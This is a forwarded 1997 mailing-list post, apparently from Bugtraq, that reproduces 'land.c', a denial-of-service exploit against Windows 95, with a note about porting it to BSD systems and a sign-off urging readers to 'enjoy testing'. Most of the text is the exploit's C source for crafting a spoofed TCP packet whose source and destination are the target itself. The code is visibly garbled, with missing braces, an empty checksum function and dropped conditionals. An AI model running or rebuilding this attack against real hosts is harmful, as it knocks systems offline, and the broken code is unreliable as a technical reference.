new TCP/IP bug in win95 (fwd)

Here's the source posted on Bugtraq yesterday.

Here's the source posted on Bugtraq yesterday.

Date: Thu, 20 Nov 1997 19:40:19 -0500
From: m3lt <meltman@LAGGED.NET>
Subject: new TCP/IP bug in win95

[ . . . deletia . . . ]

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box */

[ deleted LINUX code ]

With the help of my co-worker Jeremy Cooper, a large amount of
Starbucks coffee, and a glazed buttermilk bar, I ported this 'sploit
code to 44BSD flavors (should compile fine on FreeBSD, BSDI or NetBSD).

Enjoy testing,
   \ Tim Keanini | "The limits of my language, /
   / | are the limits of my world." \
   \ | --Ludwig Wittgenstein /
   \ +================================================/
   >Key fingerprint = 7B 68 88 41 A8 74 AB EC F0 37 98 4C 37 F7 40 D6 |
   / PUB KEY: \

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box
   Ported to 44BSD by blast and jerm */

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

struct pseudohdr
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;

u_short checksum(u_short * data,u_short length)
        register long value;
        u_short i;





int main(int argc,char * * argv)
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock,foo;
        char buffer[40];
        struct ip * ipheader=(struct ip *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt mod by blast, FLC\n");

                fprintf(stderr,"usage: %s IP port\n",argv[0]);

        bzero(&sin,sizeof(struct sockaddr_in));

        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
                fprintf(stderr,"unknown host %s\n",argv[1]);

                fprintf(stderr,"unknown port %s\n",argv[2]);

                fprintf(stderr,"couldn't allocate raw socket\n");

    fprintf(stderr,"couldn't set raw header on socket\n");

        bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
        ipheader->ip_hl=sizeof(struct ip)/4;
        ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);

        tcpheader->th_off=sizeof(struct tcphdr)/4;

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
                fprintf(stderr,"couldn't send packet,%d\n",errno);

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);